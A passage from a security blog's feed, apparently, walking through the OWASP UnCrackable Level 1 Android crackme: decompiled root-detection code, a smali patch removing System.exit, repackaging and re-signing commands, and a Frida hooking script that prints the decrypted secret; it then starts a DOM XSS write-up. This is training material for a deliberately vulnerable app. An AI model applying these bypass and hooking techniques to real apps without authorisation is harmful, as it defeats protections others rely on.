class="nc">Bundle</span> <span class="n">bundle</span><span class="o">)</span> <span class="o">{</span> <span class="mi">31</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">c</span><span class="o">.</span><span class="na">a</span><span class="o">()</span> <span class="o">||</span> <span class="n">c</span><span class="o">.</span><span class="na">b</span><span class="o">()</span> <span class="o">||</span> <span class="n">c</span><span class="o">.</span><span class="na">c</span><span class="o">())</span> <span class="o">{</span> <span class="mi">32</span><span class="o">:</span> <span class="n">a</span><span class="o">(</span><span class="s">"Root detected!"</span><span class="o">);</span> <span class="mi">33</span><span class="o">:</span> <span class="o">}</span> <span class="mi">34</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">b</span><span class="o">.</span><span class="na">a</span><span class="o">(</span><span class="n">getApplicationContext</span><span class="o">()))</span> <span class="o">{</span> <span class="mi">35</span><span class="o">:</span> <span class="n">a</span><span class="o">(</span><span class="s">"App is debuggable!"</span><span class="o">);</span> <span class="mi">36</span><span class="o">:</span> <span class="o">}</span> <span class="mi">37</span><span class="o">:</span> <span class="kd">super</span><span class="o">.</span><span class="na">onCreate</span><span class="o">(</span><span class="n">bundle</span><span class="o">);</span> <span class="mi">38</span><span class="o">:</span> <span class="n">setContentView</span><span class="o">(</span><span class="no">R</span><span class="o">.</span><span class="na">layout</span><span class="o">.</span><span class="na">activity_main</span><span class="o">);</span> <span class="mi">39</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <p>On line number 12, 13 there are 2 imports which is nothing but importing from the location <code class="language-plaintext highlighter-rouge">./UnCrackable-Level1/sources/sg/vantagepoint/a/</code> which has 3 files: a.java, b.java, c.java</p> <p>Both b.java and c.java files are being imported to the <code class="language-plaintext highlighter-rouge">MainActivity.java</code> file. The program has 2 protections inbuilt:</p> <h3 id="root-detection">Root Detection:</h3> <p>This checks if the app has been installed on a rooted device and if so, exit immediately. The function is called within <code class="language-plaintext highlighter-rouge">onCreate</code> but it’s defined in c.java file:</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mo">01</span><span class="o">:</span> <span class="kn">package</span> <span class="nn">sg.vantagepoint.a</span><span class="o">;</span> <span class="mo">02</span><span class="o">:</span> <span class="mo">03</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">android.os.Build</span><span class="o">;</span> <span class="mo">04</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">java.io.File</span><span class="o">;</span> <span class="mo">05</span><span class="o">:</span> <span class="mo">06</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">c</span> <span class="o">{</span> <span class="mo">07</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="nf">a</span><span class="o">()</span> <span class="o">{</span> <span class="mi">08</span><span class="o">:</span> <span class="k">for</span> <span class="o">(</span><span class="nc">String</span> <span class="n">file</span> <span class="o">:</span> <span class="nc">System</span><span class="o">.</span><span class="na">getenv</span><span class="o">(</span><span class="s">"PATH"</span><span class="o">).</span><span class="na">split</span><span class="o">(</span><span class="s">":"</span><span class="o">))</span> <span class="o">{</span> <span class="mi">09</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="k">new</span> <span class="nc">File</span><span class="o">(</span><span class="n">file</span><span class="o">,</span> <span class="s">"su"</span><span class="o">).</span><span class="na">exists</span><span class="o">())</span> <span class="o">{</span> <span class="mi">10</span><span class="o">:</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="mi">11</span><span class="o">:</span> <span class="o">}</span> <span class="mi">12</span><span class="o">:</span> <span class="o">}</span> <span class="mi">13</span><span class="o">:</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="mi">14</span><span class="o">:</span> <span class="o">}</span> <span class="mi">15</span><span class="o">:</span> <span class="mi">16</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="nf">b</span><span class="o">()</span> <span class="o">{</span> <span class="mi">17</span><span class="o">:</span> <span class="nc">String</span> <span class="n">str</span> <span class="o">=</span> <span class="nc">Build</span><span class="o">.</span><span class="na">TAGS</span><span class="o">;</span> <span class="mi">18</span><span class="o">:</span> <span class="k">return</span> <span class="n">str</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="n">str</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="s">"test-keys"</span><span class="o">);</span> <span class="mi">19</span><span class="o">:</span> <span class="o">}</span> <span class="mi">20</span><span class="o">:</span> <span class="mi">21</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="nf">c</span><span class="o">()</span> <span class="o">{</span> <span class="mi">22</span><span class="o">:</span> <span class="k">for</span> <span class="o">(</span><span class="nc">String</span> <span class="n">file</span> <span class="o">:</span> <span class="k">new</span> <span class="nc">String</span><span class="o">[]{</span><span class="s">"/system/app/Superuser.apk"</span><span class="o">,</span> <span class="s">"/system/xbin/daemonsu"</span><span class="o">,</span> <span class="s">"/system/etc/init.d/99SuperSUDaemon"</span><span class="o">,</span> <span class="s">"/system/bin/.ext/.su"</span><span class="o">,</span> <span class="s">"/system/etc/.has_su_daemon"</span><span class="o">,</span> <span class="s">"/system/etc/.installed_su_daemon"</span><span class="o">,</span> <span class="s">"/dev/com.koushikdutta.superuser.daemon/"</span><span class="o">})</span> <span class="o">{</span> <span class="mi">23</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="k">new</span> <span class="nc">File</span><span class="o">(</span><span class="n">file</span><span class="o">).</span><span class="na">exists</span><span class="o">())</span> <span class="o">{</span> <span class="mi">24</span><span class="o">:</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="mi">25</span><span class="o">:</span> <span class="o">}</span> <span class="mi">26</span><span class="o">:</span> <span class="o">}</span> <span class="mi">27</span><span class="o">:</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="mi">28</span><span class="o">:</span> <span class="o">}</span> <span class="mi">29</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <p>So for Root detection, they are doing 3 tests to confirm if the device is rooted or not:</p> <ol> <li><strong>Su Binary</strong>: The function checks if SU binary exists or not. If so, the device as rooted.</li> <li><strong>test-keys</strong>: During the release of kernel, keys are being used to sign it which is either <code class="language-plaintext highlighter-rouge">release-keys</code> or <code class="language-plaintext highlighter-rouge">test-keys</code>. If it’s the latter, it means the kernel was signed with a custom key generated by a 3rd party developer. This is an indication that the device might be rooted (This info is located in the file <code class="language-plaintext highlighter-rouge">/system/build.prop</code>).</li> <li><strong>/system/</strong> : These are common files/binaries which is accessible in a rooted device which is otherwise not accessible (on a non rooted device).</li> </ol> <h3 id="debuggable-app">Debuggable App:</h3> <p>By modifying the <code class="language-plaintext highlighter-rouge">AndroidManifest.xml</code>, app can be debuggable so at the run time we can connect into the app using JDB (java debugger) and modify its behaviour. In order to prevent this, a check is implemented to see if the app is debuggable and if so, the system will exit.</p> <p>Now let’s look at the <code class="language-plaintext highlighter-rouge">verify</code> function where the secret is being verified.</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">41</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">void</span> <span class="nf">verify</span><span class="o">(</span><span class="nc">View</span> <span class="n">view</span><span class="o">)</span> <span class="o">{</span> <span class="mi">42</span><span class="o">:</span> <span class="nc">String</span> <span class="n">str</span><span class="o">;</span> <span class="mi">43</span><span class="o">:</span> <span class="nc">String</span> <span class="n">obj</span> <span class="o">=</span> <span class="o">((</span><span class="nc">EditText</span><span class="o">)</span> <span class="n">findViewById</span><span class="o">(</span><span class="no">R</span><span class="o">.</span><span class="na">id</span><span class="o">.</span><span class="na">edit_text</span><span class="o">)).</span><span class="na">getText</span><span class="o">().</span><span class="na">toString</span><span class="o">();</span> <span class="mi">44</span><span class="o">:</span> <span class="nc">AlertDialog</span> <span class="n">create</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Builder</span><span class="o">(</span><span class="k">this</span><span class="o">).</span><span class="na">create</span><span class="o">();</span> <span class="mi">45</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">a</span><span class="o">.</span><span class="na">a</span><span class="o">(</span><span class="n">obj</span><span class="o">))</span> <span class="o">{</span> <span class="mi">46</span><span class="o">:</span> <span class="n">create</span><span class="o">.</span><span class="na">setTitle</span><span class="o">(</span><span class="s">"Success!"</span><span class="o">);</span> <span class="mi">47</span><span class="o">:</span> <span class="n">str</span> <span class="o">=</span> <span class="s">"This is the correct secret."</span><span class="o">;</span> <span class="mi">48</span><span class="o">:</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="mi">49</span><span class="o">:</span> <span class="n">create</span><span class="o">.</span><span class="na">setTitle</span><span class="o">(</span><span class="s">"Nope..."</span><span class="o">);</span> <span class="mi">50</span><span class="o">:</span> <span class="n">str</span> <span class="o">=</span> <span class="s">"That's not it. Try again."</span><span class="o">;</span> <span class="mi">51</span><span class="o">:</span> <span class="o">}</span> <span class="mi">52</span><span class="o">:</span> <span class="n">create</span><span class="o">.</span><span class="na">setMessage</span><span class="o">(</span><span class="n">str</span><span class="o">);</span> <span class="mi">53</span><span class="o">:</span> <span class="n">create</span><span class="o">.</span><span class="na">setButton</span><span class="o">(-</span><span class="mi">3</span><span class="o">,</span> <span class="s">"OK"</span><span class="o">,</span> <span class="k">new</span> <span class="nc">OnClickListener</span><span class="o">()</span> <span class="o">{</span> <span class="mi">54</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">void</span> <span class="nf">onClick</span><span class="o">(</span><span class="nc">DialogInterface</span> <span class="n">dialogInterface</span><span class="o">,</span> <span class="kt">int</span> <span class="n">i</span><span class="o">)</span> <span class="o">{</span> <span class="mi">55</span><span class="o">:</span> <span class="n">dialogInterface</span><span class="o">.</span><span class="na">dismiss</span><span class="o">();</span> <span class="mi">56</span><span class="o">:</span> <span class="o">}</span> <span class="mi">57</span><span class="o">:</span> <span class="o">});</span> <span class="mi">58</span><span class="o">:</span> <span class="n">create</span><span class="o">.</span><span class="na">show</span><span class="o">();</span> <span class="mi">59</span><span class="o">:</span> <span class="o">}</span> </code></pre></figure> <p>The function takes an input from the user and pass it to <code class="language-plaintext highlighter-rouge">a.a()</code>:</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="nl">File:</span> <span class="o">./</span><span class="n">uncrackable</span><span class="o">/</span><span class="nc">UnCrackable</span><span class="o">-</span><span class="nc">Level1</span><span class="o">/</span><span class="n">sources</span><span class="o">/</span><span class="n">sg</span><span class="o">/</span><span class="n">vantagepoint</span><span class="o">/</span><span class="n">uncrackable1</span><span class="o">/</span><span class="n">a</span><span class="o">.</span><span class="na">java</span> <span class="mo">01</span><span class="o">:</span> <span class="kn">package</span> <span class="nn">sg.vantagepoint.uncrackable1</span><span class="o">;</span> <span class="mo">02</span><span class="o">:</span> <span class="mo">03</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">android.util.Base64</span><span class="o">;</span> <span class="mo">04</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">android.util.Log</span><span class="o">;</span> <span class="mo">05</span><span class="o">:</span> <span class="mo">06</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">a</span> <span class="o">{</span> <span class="mo">07</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="nf">a</span><span class="o">(</span><span class="nc">String</span> <span class="n">str</span><span class="o">)</span> <span class="o">{</span> <span class="mi">08</span><span class="o">:</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">bArr</span><span class="o">;</span> <span class="mi">09</span><span class="o">:</span> <span class="nc">String</span> <span class="n">str2</span> <span class="o">=</span> <span class="s">"8d127684cbc37c17616d806cf50473cc"</span><span class="o">;</span> <span class="mi">10</span><span class="o">:</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">bArr2</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="o">[</span><span class="mi">0</span><span class="o">];</span> <span class="mi">11</span><span class="o">:</span> <span class="k">try</span> <span class="o">{</span> <span class="mi">12</span><span class="o">:</span> <span class="n">bArr</span> <span class="o">=</span> <span class="n">sg</span><span class="o">.</span><span class="na">vantagepoint</span><span class="o">.</span><span class="na">a</span><span class="o">.</span><span class="na">a</span><span class="o">.</span><span class="na">a</span><span class="o">(</span><span class="n">b</span><span class="o">(</span><span class="n">str2</span><span class="o">),</span> <span class="nc">Base64</span><span class="o">.</span><span class="na">decode</span><span class="o">(</span><span class="s">"5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc="</span><span class="o">,</span> <span class="mi">0</span><span class="o">));</span> <span class="mi">13</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">Exception</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">14</span><span class="o">:</span> <span class="nc">StringBuilder</span> <span class="n">sb</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">StringBuilder</span><span class="o">();</span> <span class="mi">15</span><span class="o">:</span> <span class="n">sb</span><span class="o">.</span><span class="na">append</span><span class="o">(</span><span class="s">"AES error:"</span><span class="o">);</span> <span class="mi">16</span><span class="o">:</span> <span class="n">sb</span><span class="o">.</span><span class="na">append</span><span class="o">(</span><span class="n">e</span><span class="o">.</span><span class="na">getMessage</span><span class="o">());</span> <span class="mi">17</span><span class="o">:</span> <span class="nc">Log</span><span class="o">.</span><span class="na">d</span><span class="o">(</span><span class="s">"CodeCheck"</span><span class="o">,</span> <span class="n">sb</span><span class="o">.</span><span class="na">toString</span><span class="o">());</span> <span class="mi">18</span><span class="o">:</span> <span class="n">bArr</span> <span class="o">=</span> <span class="n">bArr2</span><span class="o">;</span> <span class="mi">19</span><span class="o">:</span> <span class="o">}</span> <span class="mi">20</span><span class="o">:</span> <span class="k">return</span> <span class="n">str</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="k">new</span> <span class="nc">String</span><span class="o">(</span><span class="n">bArr</span><span class="o">));</span> <span class="mi">21</span><span class="o">:</span> <span class="o">}</span> <span class="mi">22</span><span class="o">:</span> <span class="mi">23</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">byte</span><span class="o">[]</span> <span class="nf">b</span><span class="o">(</span><span class="nc">String</span> <span class="n">str</span><span class="o">)</span> <span class="o">{</span> <span class="mi">24</span><span class="o">:</span> <span class="kt">int</span> <span class="n">length</span> <span class="o">=</span> <span class="n">str</span><span class="o">.</span><span class="na">length</span><span class="o">();</span> <span class="mi">25</span><span class="o">:</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">bArr</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="o">[(</span><span class="n">length</span> <span class="o">/</span> <span class="mi">2</span><span class="o">)];</span> <span class="mi">26</span><span class="o">:</span> <span class="k">for</span> <span class="o">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">length</span><span class="o">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">2</span><span class="o">)</span> <span class="o">{</span> <span class="mi">27</span><span class="o">:</span> <span class="n">bArr</span><span class="o">[</span><span class="n">i</span> <span class="o">/</span> <span class="mi">2</span><span class="o">]</span> <span class="o">=</span> <span class="o">(</span><span class="kt">byte</span><span class="o">)</span> <span class="o">((</span><span class="nc">Character</span><span class="o">.</span><span class="na">digit</span><span class="o">(</span><span class="n">str</span><span class="o">.</span><span class="na">charAt</span><span class="o">(</span><span class="n">i</span><span class="o">),</span> <span class="mi">16</span><span class="o">)</span> <span class="o">&lt;&lt;</span> <span class="mi">4</span><span class="o">)</span> <span class="o">+</span> <span class="nc">Character</span><span class="o">.</span><span class="na">digit</span><span class="o">(</span><span class="n">str</span><span class="o">.</span><span class="na">charAt</span><span class="o">(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="o">),</span> <span class="mi">16</span><span class="o">));</span> <span class="mi">28</span><span class="o">:</span> <span class="o">}</span> <span class="mi">29</span><span class="o">:</span> <span class="k">return</span> <span class="n">bArr</span><span class="o">;</span> <span class="mi">30</span><span class="o">:</span> <span class="o">}</span> <span class="mi">31</span><span class="o">:</span> <span class="o">}</span> <span class="c1">// Verify() internally calls sg.vantagepoint.a.a.a()</span> <span class="nl">File:</span> <span class="o">./</span><span class="n">uncrackable</span><span class="o">/</span><span class="nc">UnCrackable</span><span class="o">-</span><span class="nc">Level1</span><span class="o">/</span><span class="n">sources</span><span class="o">/</span><span class="n">sg</span><span class="o">/</span><span class="n">vantagepoint</span><span class="o">/</span><span class="n">a</span><span class="o">/</span><span class="n">a</span><span class="o">.</span><span class="na">java</span> <span class="mo">01</span><span class="o">:</span> <span class="kn">package</span> <span class="nn">sg.vantagepoint.a</span><span class="o">;</span> <span class="mo">02</span><span class="o">:</span> <span class="mo">03</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">javax.crypto.Cipher</span><span class="o">;</span> <span class="mo">04</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">javax.crypto.spec.SecretKeySpec</span><span class="o">;</span> <span class="mo">05</span><span class="o">:</span> <span class="mo">06</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">a</span> <span class="o">{</span> <span class="mo">07</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">byte</span><span class="o">[]</span> <span class="nf">a</span><span class="o">(</span><span class="kt">byte</span><span class="o">[]</span> <span class="n">bArr</span><span class="o">,</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">bArr2</span><span class="o">)</span> <span class="o">{</span> <span class="mi">08</span><span class="o">:</span> <span class="nc">SecretKeySpec</span> <span class="n">secretKeySpec</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">SecretKeySpec</span><span class="o">(</span><span class="n">bArr</span><span class="o">,</span> <span class="s">"AES/ECB/PKCS7Padding"</span><span class="o">);</span> <span class="mi">09</span><span class="o">:</span> <span class="nc">Cipher</span> <span class="n">instance</span> <span class="o">=</span> <span class="nc">Cipher</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="s">"AES"</span><span class="o">);</span> <span class="mi">10</span><span class="o">:</span> <span class="n">instance</span><span class="o">.</span><span class="na">init</span><span class="o">(</span><span class="mi">2</span><span class="o">,</span> <span class="n">secretKeySpec</span><span class="o">);</span> <span class="mi">11</span><span class="o">:</span> <span class="k">return</span> <span class="n">instance</span><span class="o">.</span><span class="na">doFinal</span><span class="o">(</span><span class="n">bArr2</span><span class="o">);</span> <span class="mi">12</span><span class="o">:</span> <span class="o">}</span> <span class="mi">13</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <p>Class <code class="language-plaintext highlighter-rouge">a</code> which has a parameter named <code class="language-plaintext highlighter-rouge">str</code> (which is nothing but user input) and has a predefined variable named str2, which looks like the encrypted string. The encrypted string is decrypted on the run time and is compared with the string we entered. If both values match, we have successfully completed the challenge.</p> <p>There are multiple ways in which we can solve the challenge:</p> <ul> <li>Repackaging</li> <li>Frida Instrumentation</li> <li>JDB (Runtime debugging)</li> </ul> <p>Let’s look into some of the above techniques:</p> <h2 id="bypassing-root-detection-with-repackaging">Bypassing root detection with Repackaging</h2> <p>One of the ways to solve this challenge is to decompile the app with apktool, modify the smali byte code and reinstall the app to control the function flow. Using this technique, Root detections can be bypassed in several ways:</p> <ol> <li> <p>Modify the return of each of the functions inside class <code class="language-plaintext highlighter-rouge">c</code> to always return false whether they have detected root or not.</p> </li> <li> <p>Modify the function <code class="language-plaintext highlighter-rouge">onClick</code> inside the MainActivity.java to return void instead of calling <code class="language-plaintext highlighter-rouge">system.exit</code> so that even through root is detected, the app won’t exit.</p> </li> </ol> <p>Let’s use the latter (2) to evade the root detection:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span>apktool d UnCrackable-Level1.apk <span class="nt">-o</span> uncrackable_dissas I: Using Apktool 2.4.0 on UnCrackable-Level1.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: /var/folders/9h/2_57gxb50pqg6nxhtmt9csk00000gn/T/1.apk I: Regular manifest package... I: Decoding file-resources... I: Decoding values <span class="k">*</span>/<span class="k">*</span> XMLs... I: Baksmaling classes.dex... I: Copying assets and libs... I: Copying unknown files... I: Copying original files... <span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span><span class="nb">pwd</span> ./uncrackable_dissas/smali/sg/vantagepoint/uncrackable1 <span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span><span class="nb">ls </span>MainActivity<span class="nv">$1</span>.smali MainActivity<span class="nv">$2</span>.smali MainActivity.smali a.smali</code></pre></figure> <p>If we look at the functions inside <code class="language-plaintext highlighter-rouge">MainActivity$1.smali</code>, a function named <code class="language-plaintext highlighter-rouge">OnClick</code> is calling <code class="language-plaintext highlighter-rouge">system.exit(0)</code>. Let’s modify the function to simply return void and ignore the exit call.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">File: MainActivity<span class="nv">$1</span>.smali 35: <span class="c"># virtual methods</span> 36: .method public onClick<span class="o">(</span>Landroid/content/DialogInterface<span class="p">;</span>I<span class="o">)</span>V 37: .locals 0 38: 39: const/4 p1, 0x0 40: 41: invoke-static <span class="o">{</span>p1<span class="o">}</span>, Ljava/lang/System<span class="p">;</span>-&gt;exit<span class="o">(</span>I<span class="o">)</span>V <span class="c"># remove this line</span> 42: 43: <span class="k">return</span><span class="nt">-void</span> 44: .end method Modified File: MainActivity<span class="nv">$1</span>.smali 35: <span class="c"># virtual methods</span> 36: .method public onClick<span class="o">(</span>Landroid/content/DialogInterface<span class="p">;</span>I<span class="o">)</span>V 37: .locals 0 38: 39: const/4 p1, 0x0 40: 42: 43: <span class="k">return</span><span class="nt">-void</span> 44: .end method <span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span>apktool b uncrackable_dissas <span class="nt">-o</span> modified_uncrackable.apk I: Using Apktool 2.4.0 I: Checking whether sources has changed... I: Smaling smali folder into classes.dex... I: Checking whether resources has changed... I: Building resources... I: Building apk file... I: Copying unknown files/dir... I: Built apk... <span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span>java <span class="nt">-jar</span> sign.jar modified_uncrackable.apk <span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span>adb uninstall owasp.mstg.uncrackable1 <span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span>adb <span class="nb">install </span>modified_uncrackable.s.apk</code></pre></figure> <p>Let’s run the newly installed APK and we can see that clicking on “ok” won’t exit the application. Essentially what we did here was to modify the function call “onClick” and we removed the <code class="language-plaintext highlighter-rouge">system.exit()</code> function invocation line: <code class="language-plaintext highlighter-rouge">invoke-static {p1}, Ljava/lang/System;-&gt;exit(I)V</code>. Then we recomplied, signed (using <a href="https://github.com/appium/sign" target="_blank">sign.jar</a>) and reinstalled the application to bypass this check.</p> <h2 id="leaking-the-secret-with-runtime-instrumentation---frida">Leaking the secret with runtime instrumentation - Frida</h2> <p>Frida is a dynamic runtime instrumentation toolkit using which we can hook functions, spy on crypto APIs or trace private application code on runtime. In short, using frida, we can redefine functions, leak function variables and what not ? In order to run Frida, make sure to install frida server on your rooted device and it’s running in the background as root (Frida - Install <a href="https://www.frida.re/docs/installation/" target="_blank">Client</a> and <a href="https://www.frida.re/docs/android/" target="_blank">Server</a>). Once the server is running, we can write our own script to leak the secret out of the APK during run time.</p> <p>A sample frida script (modifying function implementation) will look like this:</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="nc">Java</span><span class="o">.</span><span class="na">perform</span><span class="o">(</span><span class="n">function</span> <span class="o">()</span> <span class="o">{</span> <span class="c1">// Name of the class to start hooking.</span> <span class="kt">var</span> <span class="nc">MainActivity</span> <span class="o">=</span> <span class="nc">Java</span><span class="o">.</span><span class="na">use</span><span class="o">(</span><span class="s">"com.example.name.classname"</span><span class="o">);</span> <span class="nc">MainActivity</span><span class="o">.</span><span class="na">function_name</span><span class="o">.</span><span class="na">implementation</span> <span class="o">=</span> <span class="n">function</span><span class="o">()</span> <span class="o">{</span> <span class="c1">// write the modified function code here</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="n">console</span><span class="o">.</span><span class="na">log</span><span class="o">(</span><span class="s">"function simply returned."</span><span class="o">)</span> <span class="o">});</span></code></pre></figure> <p>In very simple terms, we can write JavaScript code to tell frida to use a class and hook its corresponding functions and reimplement it. In the above example, we hooked a function named <code class="language-plaintext highlighter-rouge">function_name</code> from a class and rewrote its implementation to make sure function always returns false during runtime.</p> <p>From the initial source code analysis, we know the decryption of the encrypted string is happening inside <code class="language-plaintext highlighter-rouge">sg/vantagepoint/a/a.java</code> where the return of the function <code class="language-plaintext highlighter-rouge">a()</code> has our secret. So using Frida, we can do the following to solve the challenge:</p> <ol> <li>Hook the function <code class="language-plaintext highlighter-rouge">a()</code> inside the class <code class="language-plaintext highlighter-rouge">sg.vantagepoint.a.a</code>.</li> <li>Modify the function implementation and call the function internally to leak its return value (byte array).</li> <li>Convert the returned byte array to ascii and append it to a string to retrieve our secret.</li> </ol> <p>So our final exploit code looks like the following:</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="nc">Java</span><span class="o">.</span><span class="na">perform</span><span class="o">(</span><span class="n">function</span> <span class="o">()</span> <span class="o">{</span> <span class="kt">var</span> <span class="n">aes</span> <span class="o">=</span> <span class="nc">Java</span><span class="o">.</span><span class="na">use</span><span class="o">(</span><span class="s">"sg.vantagepoint.a.a"</span><span class="o">);</span> <span class="c1">// Hook the function inside the class.</span> <span class="n">aes</span><span class="o">.</span><span class="na">a</span><span class="o">.</span><span class="na">implementation</span> <span class="o">=</span> <span class="n">function</span><span class="o">(</span><span class="n">var0</span><span class="o">,</span> <span class="n">var1</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// Calling the function itself to get its return value</span> <span class="kt">var</span> <span class="n">decrypt</span> <span class="o">=</span> <span class="k">this</span><span class="o">.</span><span class="na">a</span><span class="o">(</span><span class="n">var0</span><span class="o">,</span> <span class="n">var1</span><span class="o">);</span> <span class="kt">var</span> <span class="n">flag</span> <span class="o">=</span> <span class="s">""</span><span class="o">;</span> <span class="c1">// Converting the returned byte array to ascii and appending to a string</span> <span class="k">for</span><span class="o">(</span><span class="kt">var</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">decrypt</span><span class="o">.</span><span class="na">length</span><span class="o">;</span> <span class="n">i</span><span class="o">++)</span> <span class="o">{</span> <span class="n">flag</span> <span class="o">+=</span> <span class="nc">String</span><span class="o">.</span><span class="na">fromCharCode</span><span class="o">(</span><span class="n">decrypt</span><span class="o">[</span><span class="n">i</span><span class="o">]);</span> <span class="o">}</span> <span class="c1">// Leaking our secret</span> <span class="n">console</span><span class="o">.</span><span class="na">log</span><span class="o">(</span><span class="n">flag</span><span class="o">);</span> <span class="k">return</span> <span class="n">decrypt</span><span class="o">;</span> <span class="o">}</span> <span class="o">});</span></code></pre></figure> <p>Run the above exploit (exploit.js) using Frida: <code class="language-plaintext highlighter-rouge">frida -U -f owasp.mstg.uncrackable1 -l exploit.js --no-pause</code>. Once you run it, the program will be launched inside the emulator. Give some random input so that the function gets invoked at least once and look back in the Frida terminal to see the leaked secret.</p> <h2 id="references">References</h2> <ol> <li> <p>Frida: <a href="https://frida.re" target="_blank">https://frida.re</a></p> </li> <li> <p>Eduardo Novella’s solution (must read) to uncrackable level 1 (completely using Frida): <a href="https://enovella.github.io/android/reverse/2017/05/18/android-owasp-crackmes-level-1.html" target="_blank">https://enovella.github.io/android/reverse/2017/05/18/android-owasp-crackmes-level-1.html</a></p> </li> </ol> Wed, 18 Sep 2019 00:00:00 -0700 https://blog.0daylabs.com/2019/09/18/deep-dive-into-Android-security/ https://blog.0daylabs.com/2019/09/18/deep-dive-into-Android-security/ android From 4 sources to 3 sinks in DOM XSS - DomGoat level 1-10 (all levels) writeup <h2 id="introduction">Introduction</h2> <p>According to <a href="https://www.owasp.org/index.php/DOM_Based_XSS" target="_blank">OWASP</a>, DOM Based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner.</p> <p>Now what does it mean? Before diving into an example, let’s look at what “sink” and “source” means:</p> <h3 id="source">Source:</h3> <p>Source is the location from which untrusted data is taken by the application (which can be controlled by user input) and passed on to the sink. There are <a href="https://domgo.at/cxss/sources/somevalue" target="_blank">4 different categories</a> of sources:</p> <table> <thead> <tr> <th style="text-align: left">URL-based Sources</th> <th style="text-align: left">Navigation-based Sources</th> <th style="text-align: left">Communication Sources</th> <th style="text-align: left">Storage Sources</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">location</td> <td style="text-align: left">window.name</td> <td style="text-align: left">Ajax</td> <td style="text-align: left">Cookies</td> </tr> <tr> <td style="text-align: left">location.href</td> <td style="text-align: left">document.referrer</td> <td style="text-align: left">Web Sockets</td> <td style="text-align: left">localStorage</td> </tr> <tr> <td style="text-align: left">location.search</td> <td style="text-align: left"> </td> <td style="text-align: left">Window Messaging</td> <td style="text-align: left">SessionStorage</td> </tr> <tr> <td style="text-align: left">location.pathname</td> <td style="text-align: left"> </td> <td style="text-align: left"> </td> <td style="text-align: left"> </td> </tr> </tbody> </table> <p>See an example for all the sources at <a href="https://domgo.at/cxss/sources/somevalue?param1=paramvalue#hashvalue" 